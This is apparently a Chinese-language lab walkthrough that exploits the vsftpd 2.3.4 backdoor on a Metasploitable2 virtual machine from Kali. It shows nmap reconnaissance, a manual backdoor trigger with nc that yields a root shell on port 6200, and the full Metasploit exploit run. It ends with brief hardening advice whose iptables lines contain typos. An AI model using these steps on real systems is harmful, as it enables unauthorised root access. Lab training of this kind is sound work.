FTP漏洞利用

一、环境说明

靶机IP：虚拟机ip.149 系统：Metasploitable2-Linux FTP版本号：vsftpd 2.3.4

攻击IP : 虚拟机ip.151 系统：Kali-linux-2019

ip ：指同一网段的ip，这里隐藏了。做这个实验保证ip同一段就OK。

二、FTP协议介绍

文件传输协议（英文：File Transfer Protocol，缩写：FTP）是用于在网络上进行文件传输的一套标准协议，使用客户/服务器模式。它属于网络传输协议的应用层。FTP使用21号端口。

用户分类：

• Real用户
• Administrator
• 匿名用户

FTP文件传输格式：

• ASCII
• 二进制格式

三、匿名用户登录

1、确认靶机IP地址

root@kali:~# nmap ip.1/24
...
Nmap scan report for ip.149
Host is up (0.00050s latency).
Not shown: 977 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00:0C:29:83:F3:95 (VMware)
...

备注：截取扫描的部分信息，确认靶机的IP为ip.149

2、确认FTP的版本

root@kali:~# nmap -A ip.149
...
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
| STAT: 
| FTP server status:
| Connected to ip.151
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
...

备注：
-A : 全扫描，扫描 OS版本、版本信息等

3、匿名用户登录

root@kali:~#nc ip.149 21
220 (vsFTPd 2.3.4)
USER anonymous
331 Please specify the password.
PASS 123
230 Login successful.
HELP
214-The following commands are recognized.
 ABOR ACCT ALLO APPE CDUP CWD DELE EPRT EPSV FEAT HELP LIST MDTM MKD
 MODE NLST NOOP OPTS PASS PASV PORT PWD QUIT REIN REST RETR RMD RNFR
 RNTO SITE SIZE SMNT STAT STOR STOU STRU SYST TYPE USER XCUP XCWD XMKD
 XPWD XRMD
214 Help OK.

USER/PASS 输入用户名(anonymous)/密码任意输入
通过匿名用户名，任意设置的密码成功登录靶机。
输入HELP查看，可以输入被识别的命令。

四、利用FTP后门漏洞

1、使用nmap扫描FTP后门漏洞

root@kali:~# nmap --script=vuln -p 21 ip.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-21 15:15 CST
Nmap scan report for 192.168.72.149
Host is up (0.00036s latency).
PORT STATE SERVICE
21/tcp open ftp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ftp-vsftpd-backdoor: 
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2011-2523 BID:48539
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root)
| References:
| https://www.securityfocus.com/bid/48539
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
| http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
|_sslv2-drown: 
MAC Address: 00:0C:29:83:F3:95 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 11.69 seconds

CVE ： 公共漏洞和暴露

2、使用nc触发vsftpd-2.3.4后面漏洞

root@kali:~# nc ip.149 21
220 (vsFTPd 2.3.4)
USER user:)
331 Please specify the password.
PASS pass

另外打开一个终端利用该漏洞

root@kali:~# nc ip.149 6200
id
uid=0(root) gid=0(root)

nc已经成功登录靶机的bash，可以输入linux命令。
nc 靶机ip地址 端口号
vsftpd手工出发漏洞：当进行FTP认证时，如果用户名USER中包含:)，那么直接就触发监听6200端口的连接的shell。
6200端口 默认没有开启的，从确认靶机IP的扫描信息就可以看出。

五、Metasploit实战：FTP漏洞利用

1、启动postgresql

root@kali:~# systemctl start postgresql
root@kali:~# systemctl status postgresql
 postgresql.service - PostgreSQL RDBMS
 Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor p>
 Active: active (exited) since Thu 2020-05-21 15:22:14 CST; 15s ago
 Process: 6362 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
 Main PID: 6362 (code=exited, status=0/SUCCESS)
May 21 15:22:14 kali systemd[1]: Starting PostgreSQL RDBMS...
May 21 15:22:14 kali systemd[1]: Finished PostgreSQL RDBMS.

systemctl start postgresql ： 开启postgresql数据库

systemctl status postgresql ：检测postgresql数据库的状态

2、使用Metasploit进行渗透

2.1 登录msfconsole控制台

root@kali:~# msfconsole

2.2 连接一个DB

msf5 > db_connect msf:123456@127.0.0.1/msf

连接metasploit的默认msf数据库，也可以自己创建数据库，连接自己创建的数据库。数据库记录探测的记录。

2.3 使用nmap探测目标FTP

msf5 > db_nmap -sV -p 21 ip.149
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-21 20:18 CST
[*] Nmap: Nmap scan report for 192.168.72.149
[*] Nmap: Host is up (0.00032s latency).
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: MAC Address: 00:0C:29:83:F3:95 (VMware)
[*] Nmap: Service Info: OS: Unix
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 2.70 seconds

2.4 查看数据库探测记录

msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
ip.149 21 tcp ftp open vsftpd 2.3.4

2.5 搜索漏洞代码

msf5 > search vsftpd 2.3.4
Matching Modules
================
 # Name Disclosure Date Rank Check Description
 - ---- --------------- ---- ----- -----------
 0 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
 1 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
 2 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
 3 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution

2.6 设置payload相关配置

msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
 RPORT 21 yes The target port (TCP)
Exploit target:
 Id Name
 -- ----
 0 Automatic

2.7 设置靶机IP地址，查看设置是否成功

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS ip.149
RHOSTS => ip.149
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 RHOSTS ip.149 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
 RPORT 21 yes The target port (TCP)
Exploit target:
 Id Name
 -- ----
 0 Automatic

2.8 执行exploit攻击，获得Bash shell

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] ip.149:21 - Banner: 220 (vsFTPd 2.3.4)
[*] ip.149:21 - USER: 331 Please specify the password.
[+] ip.149:21 - Backdoor service has been spawned, handling...
[+] ip.149:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> ip.149:6200) at 2020-05-21 15:53:08 +0800
whoami
root

验证是否登录了靶机的Bash shell。输入whoami命令，查看登录用户名为root。也可以输入其他命令。

六、FTP漏洞加固

1、修改系统FTP配置文档（/etc/vsftpd/vsftpd.conf）,禁止匿名用户登录。
2、对特定漏洞进行打补丁，或者设置防火墙禁止连接后门端口。

iptables -A INPUT -p tcp -dport 6200 -j DROP
iptabels -A OUTPUT -p tcp sport 6200 -j DROP